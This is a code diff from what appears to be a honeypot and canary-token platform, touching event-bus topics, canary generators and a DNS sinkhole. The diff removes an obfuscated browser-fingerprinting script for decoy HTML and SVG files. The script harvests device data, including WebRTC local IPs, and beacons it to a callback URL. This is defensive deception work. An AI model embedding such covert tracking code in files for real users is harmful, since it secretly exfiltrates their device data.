"""Return ``(sid → [(offset, length), …], file_size)``.
Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
"""
st = path.stat()
key = (str(path), st.st_mtime_ns)
if key in _INDEX_CACHE:
_INDEX_CACHE.move_to_end(key)
return _INDEX_CACHE[key], st.st_size
index = _build_index(path)
_INDEX_CACHE[key] = index
_INDEX_CACHE.move_to_end(key)
while len(_INDEX_CACHE) > _CACHE_MAX:
_INDEX_CACHE.popitem(last=False)
return index, st.st_size
def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
"""Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
transcripts dir until one claims this ``sid``.
Newest shards first — most lookups are for recent sessions. Caches
the per-shard sid index, so repeated calls are ~free until the
shard's mtime changes.
Returns ``None`` when nothing claims the sid OR when the
transcripts dir is missing / unreadable. Never raises on
filesystem-level errors — callers treat ``None`` as "skip".
"""
validate_names(decky, service)
root = ARTIFACTS_ROOT.resolve()
transcripts_dir = (root / decky / service / "transcripts").resolve()
if root not in transcripts_dir.parents:
return None
try:
if not transcripts_dir.is_dir():
return None
entries = list(transcripts_dir.iterdir())
except (OSError, PermissionError):
return None
shards = sorted(
(p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
reverse=True,
)
for shard in shards:
try:
index, _size = get_index(shard)
except (OSError, PermissionError):
continue
if sid in index:
return shard
return None

View File

@@ -13,7 +13,7 @@ from typing import Sequence
from decnet.asn.base import Provider
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
from decnet.asn.iptoasn.parse import parse_file
from decnet.asn.lookup import AsnLookup, Range
from decnet.asn.lookup import AsnLookup
from decnet.asn.paths import ensure_root
logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
"asn.iptoasn: cache load failed, rebuilding: %s", exc
)
ranges: list[Range] = []
ranges = []
for path in self.data_paths():
if not path.exists():
continue

View File

@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
up at all we no-op.
"""
try:
from decnet.telemetry import wrap_repository
from decnet.telemetry import wrap_repository # type: ignore[attr-defined]
except ImportError:
return bus
try:

View File

@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
contract the rest of this module already upholds.
"""
if bus is None:
return lambda _topic, _payload, _event_type="": None # type: ignore[misc]
return lambda _topic, _payload, _event_type="": None
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
# Stream threads may keep draining after the bus owner closed it

View File

@@ -17,7 +17,6 @@ Token structure (NATS-style, dot-separated):
attacker.scored
attacker.session.started
attacker.session.ended
attacker.observation.{primitive}
identity.formed
identity.observation.linked
identity.merged
@@ -29,18 +28,12 @@ Token structure (NATS-style, dot-separated):
campaign.unmerged
credential.captured
credential.reuse.detected
attribution.profile.state_changed
attribution.profile.multi_actor_suspected
canary.{token_id}.triggered
canary.{token_id}.placed
canary.{token_id}.revoked
system.log
system.bus.health
system.{worker}.health
email.received
ttp.tagged
ttp.rule.fired.{technique_id}
ttp.rule.suppressed
Wildcards (per :func:`decnet.bus.base.matches`):
@@ -59,12 +52,8 @@ IDENTITY = "identity"
CAMPAIGN = "campaign"
SYSTEM = "system"
CREDENTIAL = "credential"
ATTRIBUTION = "attribution"
ORCHESTRATOR = "orchestrator"
CANARY = "canary"
SMTP = "smtp"
EMAIL = "email"
TTP = "ttp"
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -94,19 +83,6 @@ DECKY_MUTATE_REQUEST = "mutate_request"
# syslog sidechannel too) to interleave substrate-change markers into
# attacker traversals.
DECKY_MUTATION = "mutation"
# Per-service add/remove on a deployed decky (live; no full redeploy).
# Payload carries ``decky_name``, ``service_name``, optional
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
# that watch substrate shape (correlator, dashboard, profiler) reconcile
# off these without waiting for the next decnet-state.json snapshot.
DECKY_SERVICE_ADDED = "service_added"
DECKY_SERVICE_REMOVED = "service_removed"
# Per-service config change (the schema-driven Inspector form). Payload
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
# ``service_config`` (the new validated dict), and ``recreated`` — true
# when the operator hit Apply (container was force-recreated to pick up
# the new env), false when they only hit Save (DB-only).
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
# Attacker event types (second token under the ``attacker`` root). First
# sighting, session boundary transitions, and score-threshold crossings
@@ -118,14 +94,6 @@ ATTACKER_SCORED = "scored"
# Distinct from ``observed`` which is the correlator's first-sight signal —
# a fingerprint is additional evidence about an already-observed attacker.
ATTACKER_FINGERPRINTED = "fingerprinted"
# Published when the prober observes a NEW hash for an
# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
# attacker rotated their VPS, rebuilt their SSH server, swapped their
# TLS cert. Distinct from ``fingerprinted`` which fires on every probe
# result; ``fingerprint_rotated`` fires only on diff and carries both
# old_hash + new_hash. Producer: prober (via the rotation library);
# consumers: dashboard, forensics, attribution clustering.
ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
ATTACKER_SESSION_STARTED = "session.started"
ATTACKER_SESSION_ENDED = "session.ended"
# Published by the ``decnet enrich`` worker after an enrichment pass
@@ -133,19 +101,6 @@ ATTACKER_SESSION_ENDED = "session.ended"
# returned a verdict). Payload carries the aggregate verdict + per-
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
ATTACKER_INTEL_ENRICHED = "intel.enriched"
# Per-primitive BEHAVE-SHELL observation. Full topic shape:
# attacker.observation.<primitive>
# e.g. ``attacker.observation.motor.input_modality``. Producer:
# ``decnet/profiler/behave_shell/`` (extractor library called from the
# profiler worker on ``attacker.session.ended``); consumers: dashboard
# SSE relay, attribution engine state machine, federation gossip
# (post-v0). See development/BEHAVE-INTEGRATION.md §"Bus topics" for
# the wire-format contract — the prefix is documentation + pattern
# match only; bus auth is socket file perms (DEBT-029 §2), not
# topic-level. The ``primitive`` segment MAY contain dots
# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
# rule that ``attacker.session.ended`` uses.
ATTACKER_OBSERVATION_PREFIX = "observation"
# Identity-resolution event types (second/third tokens under ``identity``).
# Published by the (future) clusterer worker — see
@@ -213,42 +168,6 @@ CAMPAIGN_UNMERGED = "unmerged"
CREDENTIAL_CAPTURED = "captured"
CREDENTIAL_REUSE_DETECTED = "reuse.detected"
# Attribution-engine event types (second/third tokens under
# ``attribution``). Published by the v0 attribution worker
# (``decnet.correlation.attribution_worker``) which subscribes to
# ``attacker.observation.>`` and runs the per-(identity, primitive)
# state machine. See ``development/ATTRIBUTION-ENGINE.md``.
#
# attribution.profile.state_changed — per-primitive state
# transition (e.g.
# stable → drifting).
# Payload: identity_uuid,
# primitive, old_state,
# new_state, current_value,
# confidence,
# observation_count, ts.
# attribution.profile.multi_actor_suspected — fires when ≥ 2
# primitives flag the same
# identity as multi_actor
# concurrently. Cross-
# primitive correlator;
# single-primitive
# multi_actor is too noisy
# on its own. Payload:
# identity_uuid, primitives,
# evidence_summary,
# confidence, ts.
#
# These are *derived* signals — distinct from
# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
# ``attacker.observation.*`` (raw extractor envelopes,
# BEHAVE-INTEGRATION.md). The three families compose: observations feed
# the attribution engine, the engine emits derived state, the clusterer
# reads observations + state to form / merge identities.
ATTRIBUTION_PROFILE_PREFIX = "profile"
ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
# Canary-token event types (third token under ``canary``).
#
# canary.{token_id}.placed — orchestrator/API successfully planted a
@@ -312,43 +231,6 @@ WORKER_CONTROL_START = "start"
# of patterns. Payload is currently empty; consumers only need the signal.
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
# Email-receipt event — fired by smtp / smtp-relay services on full-message
# receipt (envelope + headers + body + attachments captured). Single-token
# leaf so the bus tokenizer accepts it directly under the ``email`` root.
# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
# counts, header names, and rcpt-domain sets — never rcpt addresses or body
# bytes.
EMAIL_RECEIVED = "received"
# TTP-tagging event types (second/third tokens under ``ttp``).
#
# ttp.tagged — one or more new tags written. Published
# only when ``INSERT OR IGNORE`` wrote at
# least one new row; idempotent
# re-evaluations publish nothing
# (loop-prevention invariant — see
# TTP_TAGGING.md).
# ttp.rule.fired.{technique_id} — per-technique fan-out for SIEM
# consumers that subscribe to a single
# technique. Topic key is the parent
# technique; sub_technique is in the
# payload. Built via :func:`ttp_rule_fired`.
# ttp.rule.suppressed — rule fired but the tag was dropped
# (confidence below floor, rate-limited,
# or the rule's RuleState was disabled).
# Observability signal for the dashboard.
#
# Per-rule reload + state-change topics. Built via
# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
TTP_TAGGED = "tagged"
TTP_RULE_FIRED = "rule.fired"
TTP_RULE_SUPPRESSED = "rule.suppressed"
TTP_RULE_RELOADED = "rule.reloaded"
TTP_RULE_STATE = "rule.state"
# ─── Builders ────────────────────────────────────────────────────────────────
@@ -419,42 +301,6 @@ def attacker(event_type: str) -> str:
return f"{ATTACKER}.{event_type}"
def attacker_observation(primitive: str) -> str:
"""Build ``attacker.observation.<primitive>``.
*primitive* is the fully-qualified BEHAVE-SHELL primitive path
(e.g. ``motor.input_modality``,
``cognitive.feedback_loop_engagement``,
``motor.shell_mastery.tab_completion``). Dotted primitives are
permitted — this matches the format
``behave_shell.spec.event_adapter.event_topic_for`` produces
upstream, and DECNET's bus admits the dotted leaf the same way
:func:`attacker` does for ``session.started``.
Empty string is rejected so a downstream typo doesn't ship as
``attacker.observation.``.
"""
if not primitive:
raise ValueError(
"attacker_observation topic requires a non-empty primitive",
)
return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
def attribution(event_type: str) -> str:
"""Build ``attribution.<event_type>``.
*event_type* is typically one of
:data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
:data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
dot (``profile.state_changed``) which is permitted under the same
"trailing dotted leaf" rule that ``attacker.session.started`` uses.
"""
if not event_type:
raise ValueError("attribution topic requires a non-empty event_type")
return f"{ATTRIBUTION}.{event_type}"
def campaign(event_type: str) -> str:
"""Build ``campaign.<event_type>``.
@@ -535,86 +381,6 @@ def system_control(worker: str) -> str:
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
def smtp(event_type: str) -> str:
"""Build ``smtp.<event_type>``.
*event_type* may contain dots (e.g. ``probe.pending``).
"""
if not event_type:
raise ValueError("smtp topic requires a non-empty event_type")
return f"{SMTP}.{event_type}"
def email_topic(event_type: str) -> str:
"""Build ``email.<event_type>``.
Named ``email_topic`` rather than ``email`` to avoid shadowing the
Python ``email`` stdlib package at import sites that pull both.
*event_type* is typically :data:`EMAIL_RECEIVED`.
"""
if not event_type:
raise ValueError("email topic requires a non-empty event_type")
return f"{EMAIL}.{event_type}"
def ttp(event_type: str) -> str:
"""Build ``ttp.<event_type>``.
*event_type* is typically one of :data:`TTP_TAGGED`,
:data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
leaves (``rule.fired``) are permitted — same rationale as
:func:`system`. For per-technique fan-out use
:func:`ttp_rule_fired`.
"""
if not event_type:
raise ValueError("ttp topic requires a non-empty event_type")
return f"{TTP}.{event_type}"
def ttp_rule_fired(technique_id: str) -> str:
"""Build ``ttp.rule.fired.<technique_id>``.
Per-technique fan-out: SIEM subscribers can listen on
``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
one technique. *technique_id* is validated as a single segment —
sub-techniques like ``T1110.001`` are rejected because they would
split into two tokens. The topic key is the parent technique;
``sub_technique_id`` lives in the payload.
"""
_reject_tokens(technique_id)
return f"{TTP}.rule.fired.{technique_id}"
def ttp_rule_reloaded(rule_id: str) -> str:
"""Build ``ttp.rule.reloaded.<rule_id>``.
Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
when a rule's *definition* changes (YAML edit on the filesystem
backend, ``ttp_rule`` row update on the database backend). One event
per per-rule edit — never batched (the "incremental, never batched"
property in TTP_TAGGING.md §"Bus topics" inherits its granularity
from :meth:`RuleStore.subscribe_changes`).
Subscribers: ``ttp.rule.reloaded.>`` for every rule,
``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
single segment.
"""
_reject_tokens(rule_id)
return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
def ttp_rule_state(rule_id: str) -> str:
"""Build ``ttp.rule.state.<rule_id>``.
Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
when a rule's *operational state* changes (operator hits the disable
button, an ``expires_at`` TTL fires and auto-reverts the state).
*rule_id* is validated as a single segment.
"""
_reject_tokens(rule_id)
return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
def _reject_tokens(*parts: str) -> None:
"""Reject topic segments that would break NATS-style tokenization.

View File

@@ -1,18 +0,0 @@
// Node helper invoked by decnet.canary.obfuscator.
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
// Kept dependency-light on purpose: only javascript-obfuscator.
const JsObf = require('javascript-obfuscator');
let raw = '';
process.stdin.setEncoding('utf8');
process.stdin.on('data', (chunk) => { raw += chunk; });
process.stdin.on('end', () => {
try {
const { code, options } = JSON.parse(raw);
const result = JsObf.obfuscate(code, options || {});
process.stdout.write(result.getObfuscatedCode());
} catch (e) {
process.stderr.write(String(e && e.stack || e));
process.exit(2);
}
});

View File

@@ -100,12 +100,6 @@ class CanaryArtifact:
planting. Never leaked to the attacker-facing surface.
"""
fingerprint_nonce: Optional[str] = None
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
so the worker can validate incoming ``?k=`` params.
"""
class CanaryGenerator(ABC):
"""Produces a fake artifact from scratch."""

View File

@@ -46,8 +46,6 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
}
@@ -64,8 +62,6 @@ _GENERATOR_TO_KIND: dict[str, str] = {
"honeydoc_pdf": "http",
"ssh_key": "dns", # trip is DNS resolution of host comment
"mysql_dump": "dns", # trip is DNS resolution of subdomain
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
"fingerprint_svg": "http", # same, embedded inside SVG <script>
}
@@ -82,8 +78,6 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
}
@@ -142,12 +136,10 @@ async def cultivate(
)
callback_token = _new_callback_token()
http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
ctx = CanaryContext(
callback_token=callback_token,
http_base=http_base_str,
dns_zone=dns_zone_str,
http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""),
dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""),
persona="linux", # all our deckies are POSIX in MVP
)
generator = get_generator(gen_name)
@@ -162,7 +154,7 @@ async def cultivate(
# attribute a callback if the artifact trips during the plant
# itself (improbable but possible — DOCX viewers can preview
# autoplay-style).
token_data: dict = {
await repo.create_canary_token({
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
"decky_name": plan.decky_name,
"instrumenter": None,
@@ -173,10 +165,7 @@ async def cultivate(
"placed_at": datetime.now(timezone.utc),
"created_by": created_by,
"state": "planted",
}
if artifact.fingerprint_nonce is not None:
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
await repo.create_canary_token(token_data)
})
# Carry the placement_path on the artifact so the orchestrator's
# plant_file call uses it. We don't mutate the generator's

View File

@@ -131,7 +131,7 @@ def _build_response(
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
answer = b""
if an_count and answer_ip is not None:
if an_count:
# Use a name pointer back to the question (offset 12).
ptr = struct.pack("!H", 0xC000 | 12)
rdata = bytes(int(o) for o in answer_ip.split("."))
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
self._answer_ip = answer_ip
self._transport: Optional[asyncio.DatagramTransport] = None
def connection_made(self, transport) -> None:
self._transport = transport
def connection_made(self, transport) -> None: # type: ignore[override]
self._transport = transport # type: ignore[assignment]
def datagram_received(
def datagram_received( # type: ignore[override]
self, data: bytes, addr: Tuple[str, int],
) -> None:
try:
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
return
# Known name — answer with our sinkhole IP, then fire the hook.
self._send(addr, _build_response(query, answer_ip=self._answer_ip))
asyncio.ensure_future(self._hook(slug, query, addr[0]))
asyncio.create_task(self._hook(slug, query, addr[0]))
def _slug_for(self, qname: str) -> Optional[str]:
if not self._zone or not qname.endswith(self._suffix):

View File

@@ -21,8 +21,6 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
"honeydoc_docx",
"honeydoc_pdf",
"mysql_dump",
"fingerprint_html",
"fingerprint_svg",
)
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -66,16 +64,6 @@ def get_generator(name: str) -> CanaryGenerator:
if name == "mysql_dump":
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
return MySQLDumpGenerator()
if name == "fingerprint_html":
from decnet.canary.generators.fingerprint_html import (
FingerprintHtmlGenerator,
)
return FingerprintHtmlGenerator()
if name == "fingerprint_svg":
from decnet.canary.generators.fingerprint_svg import (
FingerprintSvgGenerator,
)
return FingerprintSvgGenerator()
raise ValueError(
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
)

View File

@@ -1,291 +0,0 @@
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
// canary, harvests browser primitives, and beacons the result back to the
// canary worker. Ported from canary-self-test.html with the rendering UI
// stripped out.
//
// Three placeholders are substituted by the Python builder BEFORE
// javascript-obfuscator runs:
//
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
//
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
// then a fingerprint payload sent as a base64-URL query param on a second
// GET so the existing worker records the hit even before step-4 POST
// support lands. Both fail-open: any error short-circuits to next step.
(async function () {
var BEACON_URL = "{{BEACON_URL}}";
var MINT_UUID = "{{MINT_UUID}}";
var MINT_NONCE = "{{MINT_NONCE}}";
var fp = { mint: MINT_UUID };
function fire(url) {
try {
var img = new Image();
img.src = url;
} catch (e) { /* swallow */ }
}
// 1) bare-open beacon — fires regardless of whether the rest succeeds
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
function sha256(str) {
var buf = new TextEncoder().encode(str);
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
return Array.from(new Uint8Array(h))
.map(function (b) { return b.toString(16).padStart(2, "0"); })
.join("");
});
}
// navigator
try {
fp.nav = {
ua: navigator.userAgent,
pl: navigator.platform,
lg: navigator.language,
lgs: (navigator.languages || []).join(","),
ck: navigator.cookieEnabled,
dnt: navigator.doNotTrack,
hc: navigator.hardwareConcurrency,
dm: navigator.deviceMemory || null,
tp: navigator.maxTouchPoints,
wd: navigator.webdriver === true,
pdf: navigator.pdfViewerEnabled || null,
};
} catch (e) { fp.nav = { err: String(e) }; }
// screen
try {
fp.scr = {
w: screen.width, h: screen.height,
aw: screen.availWidth, ah: screen.availHeight,
cd: screen.colorDepth, pd: screen.pixelDepth,
dpr: window.devicePixelRatio,
iw: window.innerWidth, ih: window.innerHeight,
or: (screen.orientation && screen.orientation.type) || null,
};
} catch (e) { fp.scr = { err: String(e) }; }
// tz / locale
try {
var dtf = Intl.DateTimeFormat().resolvedOptions();
fp.tz = {
z: dtf.timeZone, lc: dtf.locale,
ca: dtf.calendar, ns: dtf.numberingSystem,
off: new Date().getTimezoneOffset(),
};
} catch (e) { fp.tz = { err: String(e) }; }
// connection
try {
var c = navigator.connection;
fp.cn = c ? {
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
} : null;
} catch (e) { fp.cn = { err: String(e) }; }
// canvas
try {
var cv = document.createElement("canvas");
cv.width = 280; cv.height = 60;
var ctx = cv.getContext("2d");
ctx.textBaseline = "top";
ctx.font = "14px Arial";
ctx.fillStyle = "#f60";
ctx.fillRect(125, 1, 62, 20);
ctx.fillStyle = "#069";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
ctx.fillStyle = "rgba(102,204,0,0.7)";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
var dataURL = cv.toDataURL();
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
} catch (e) { fp.cv = { err: String(e) }; }
// webgl
try {
var gc = document.createElement("canvas");
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
if (gl) {
var ext = gl.getExtension("WEBGL_debug_renderer_info");
fp.gl = {
v: gl.getParameter(gl.VENDOR),
r: gl.getParameter(gl.RENDERER),
ver: gl.getParameter(gl.VERSION),
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
};
} else { fp.gl = { err: "unavailable" }; }
} catch (e) { fp.gl = { err: String(e) }; }
// audio
try {
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
if (ACtx) {
var actx = new ACtx(1, 44100, 44100);
var osc = actx.createOscillator();
var cmp = actx.createDynamicsCompressor();
osc.type = "triangle"; osc.frequency.value = 10000;
cmp.threshold.value = -50; cmp.knee.value = 40;
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
osc.connect(cmp); cmp.connect(actx.destination);
osc.start(0);
var buf = await actx.startRendering();
var data = buf.getChannelData(0).slice(4500, 5000);
var sum = 0;
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
} else { fp.au = { err: "unavailable" }; }
} catch (e) { fp.au = { err: String(e) }; }
// fonts
try {
var bases = ["monospace", "sans-serif", "serif"];
var tests = [
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
"San Francisco", "Helvetica Neue", "Lucida Grande",
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
"Noto Sans", "Noto Mono",
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
"Malgun Gothic", "Noto Sans CJK",
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
"Bahnschrift", "Cyberpunk",
];
var sp = document.createElement("span");
sp.style.fontSize = "72px";
sp.style.position = "absolute";
sp.style.left = "-9999px";
sp.innerHTML = "mmmmmmmmmmlli";
document.body.appendChild(sp);
var bs = {};
for (var bi = 0; bi < bases.length; bi++) {
sp.style.fontFamily = bases[bi];
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
}
var det = [];
for (var ti = 0; ti < tests.length; ti++) {
for (var bj = 0; bj < bases.length; bj++) {
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
if (sp.offsetWidth !== bs[bases[bj]].w ||
sp.offsetHeight !== bs[bases[bj]].h) {
det.push(tests[ti]); break;
}
}
}
document.body.removeChild(sp);
fp.ft = {
h: await sha256(det.slice().sort().join(",")),
n: det.length, t: tests.length, d: det,
};
} catch (e) { fp.ft = { err: String(e) }; }
// webrtc local ip leak
try {
var ips = {}; var cands = [];
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
window.mozRTCPeerConnection;
if (RPC) {
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
pc.createDataChannel("");
pc.onicecandidate = function (e) {
if (!e.candidate) return;
cands.push(e.candidate.candidate);
var m = e.candidate.candidate.match(
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
if (m) ips[m[1]] = 1;
};
var off = await pc.createOffer();
await pc.setLocalDescription(off);
await new Promise(function (r) { setTimeout(r, 1500); });
pc.close();
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
} else { fp.rtc = { err: "unavailable" }; }
} catch (e) { fp.rtc = { err: String(e) }; }
// battery
try {
if (navigator.getBattery) {
var bat = await navigator.getBattery();
fp.bt = {
c: bat.charging, l: bat.level,
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
};
} else { fp.bt = { err: "unavailable" }; }
} catch (e) { fp.bt = { err: String(e) }; }
// perf timing jitter
try {
var samples = [];
for (var pi = 0; pi < 1000; pi++) {
var pa = performance.now();
var x = 0;
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
samples.push(performance.now() - pa);
}
samples.sort(function (a, b) { return a - b; });
fp.pf = {
med: samples[500].toFixed(4),
p95: samples[950].toFixed(4),
mn: samples[0].toFixed(4),
mx: samples[999].toFixed(4),
};
} catch (e) { fp.pf = { err: String(e) }; }
// permissions
try {
if (navigator.permissions) {
var names = ["geolocation", "notifications", "camera", "microphone",
"persistent-storage", "clipboard-read", "clipboard-write"];
var st = {};
for (var ni = 0; ni < names.length; ni++) {
try {
var r = await navigator.permissions.query({ name: names[ni] });
st[names[ni]] = r.state;
} catch (e) { st[names[ni]] = "unsupported"; }
}
fp.pm = st;
} else { fp.pm = { err: "unavailable" }; }
} catch (e) { fp.pm = { err: String(e) }; }
// composite identity hash — stable inputs only
try {
var stable = [
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
fp.scr && (fp.scr.w + "x" + fp.scr.h),
].filter(Boolean).join("|");
fp.id = await sha256(stable);
} catch (e) { fp.id = { err: String(e) }; }
// 2) ship the payload as base64url JSON on a GET query param.
// The current worker records the hit on /c/<slug>; step-4 worker
// will decode ?d= and persist the fingerprint blob.
try {
var json = JSON.stringify(fp);
var b64 = btoa(unescape(encodeURIComponent(json)))
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
// chunk if URL would exceed safe limit (~6KB)
var MAX = 6000;
if (b64.length <= MAX) {
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
} else {
var sid = (Math.random() * 1e9 | 0).toString(36);
var total = Math.ceil(b64.length / MAX);
for (var ci = 0; ci < total; ci++) {
var part = b64.substr(ci * MAX, MAX);
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
}
}
} catch (e) { /* swallow */ }
})();

View File

@@ -1,140 +0,0 @@
"""HTML fingerprint canary — plausible-looking page with an obfuscated
browser-fingerprinting payload inlined at the bottom of ``<body>``.
The visible content is a deliberately mundane "internal directory"
table — the kind of file a curious attacker pulls off a decky's
filesystem and opens locally to triage. When the file is opened in
*any* network-connected browser the obfuscated payload runs and beacons
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
timing jitter, permissions, composite identity hash).
Determinism: the mint UUID is derived from the callback token via
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
output, satisfying the generator contract in :mod:`decnet.canary.base`.
The obfuscator's seed and polymorphic config bits are likewise
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
"""
from __future__ import annotations
import hashlib
import uuid
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
def _mint_uuid_for(callback_token: str) -> str:
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
def _stable_int(callback_token: str, salt: str = "") -> int:
"""Deterministic non-negative int derived from the callback token.
``builtins.hash`` is salted per-process — useless for a generator
that must be byte-identical across runs. SHA-256 prefix is
overkill but free.
"""
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
return int.from_bytes(h[:4], "big")
